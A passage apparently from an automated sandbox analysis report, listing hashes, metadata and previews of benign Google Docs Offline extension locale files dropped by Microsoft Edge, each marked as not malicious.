                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
